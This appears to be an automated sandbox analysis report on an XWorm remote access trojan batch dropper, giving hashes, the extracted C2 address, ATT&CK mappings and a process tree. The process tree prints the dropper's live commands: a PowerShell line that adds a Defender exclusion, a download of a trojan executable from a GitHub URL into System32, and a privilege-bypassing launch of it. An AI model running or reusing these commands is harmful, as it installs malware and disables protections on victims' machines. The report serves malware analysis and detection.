xworm | bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c

General

Target

echooff.bat
Size

2KB
MD5

1454db52a096ed81ab7ca936367ceabd
SHA1

25c32881677a892e4b9bc7d45d387bec22847685
SHA256

bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c
SHA512

a895401536357a07d9bd9167f5c36152a8e06c68bf6967b8540493c51fc1f8cfd4bd60cf68a094ebddf33e272c3c39fa753952bba3c0ca0cc39bfc1e939792c7

Score

10^/10

xworm defense_evasion execution privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

fEkivyZANGvej5MK

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000b000000023b3d-30.dat	family_xworm
behavioral2/memory/2296-32-0x0000000000CF0000-0x0000000000CFE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1204	powershell.exe
13	1204	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
524	powershell.exe
1204	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
13	1204	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2296	tes.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
13	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\tes.exe	powershell.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4696	cmd.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
524	powershell.exe
524	powershell.exe
1204	powershell.exe
1204	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	524	powershell.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	2296	tes.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 4476	3096	cmd.exe	86
PID 3096 wrote to memory of 4476	3096	cmd.exe	86
PID 3096 wrote to memory of 4388	3096	cmd.exe	87
PID 3096 wrote to memory of 4388	3096	cmd.exe	87
PID 4388 wrote to memory of 1180	4388	cmd.exe	88
PID 4388 wrote to memory of 1180	4388	cmd.exe	88
PID 4388 wrote to memory of 1076	4388	cmd.exe	89
PID 4388 wrote to memory of 1076	4388	cmd.exe	89
PID 3096 wrote to memory of 524	3096	cmd.exe	90
PID 3096 wrote to memory of 524	3096	cmd.exe	90
PID 3096 wrote to memory of 1204	3096	cmd.exe	91
PID 3096 wrote to memory of 1204	3096	cmd.exe	91
PID 3096 wrote to memory of 4696	3096	cmd.exe	96
PID 3096 wrote to memory of 4696	3096	cmd.exe	96
PID 4696 wrote to memory of 2296	4696	cmd.exe	97
PID 4696 wrote to memory of 2296	4696	cmd.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\echooff.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
    3⤵
    PID:1180
- - C:\Windows\system32\find.exe
    find /i "MD5 hash"
    3⤵
    PID:1076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\tes.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1204
- C:\Windows\system32\cmd.exe
  cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe""
  2⤵
  - Access Token Manipulation: Create Process with Token
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\System32\tes.exe
    "C:\Windows\System32\tes.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Access Token Manipulation

1

T1134

Create Process with Token

1

T1134.002

Defense Evasion

Access Token Manipulation

1

T1134

Create Process with Token

1

T1134.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plmzg2bw.dkl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\tes.exe

Filesize
32KB

MD5
4fc044304cc6300f4c616587d81b0244

SHA1
2497c2a35feba85a5e7500e86f24d78b959b31b0

SHA256
882693e145705dcc3ecc52d5fd5187cdf3ae6da1c67af12e229746b0d64e9454

SHA512
d5298d83decffcca0f188b8c1a186ecbc85a8427da7feb618b403d24bb7ad05727068ed841f83bc3f1cda1cf8a56ed4fa3733e6c4731623c2e6e36675d4aa40e

Download Submit
memory/524-0-0x00007FFCD1AD3000-0x00007FFCD1AD5000-memory.dmp

Filesize
8KB

Download
memory/524-1-0x000001815C770000-0x000001815C792000-memory.dmp

Filesize
136KB

Download
memory/524-11-0x00007FFCD1AD0000-0x00007FFCD2591000-memory.dmp

Filesize
10.8MB

Download
memory/524-12-0x00007FFCD1AD0000-0x00007FFCD2591000-memory.dmp

Filesize
10.8MB

Download
memory/524-15-0x00007FFCD1AD0000-0x00007FFCD2591000-memory.dmp

Filesize
10.8MB

Download
memory/2296-32-0x0000000000CF0000-0x0000000000CFE000-memory.dmp

Filesize
56KB

Download
memory/2296-33-0x00000000015F0000-0x00000000015FC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads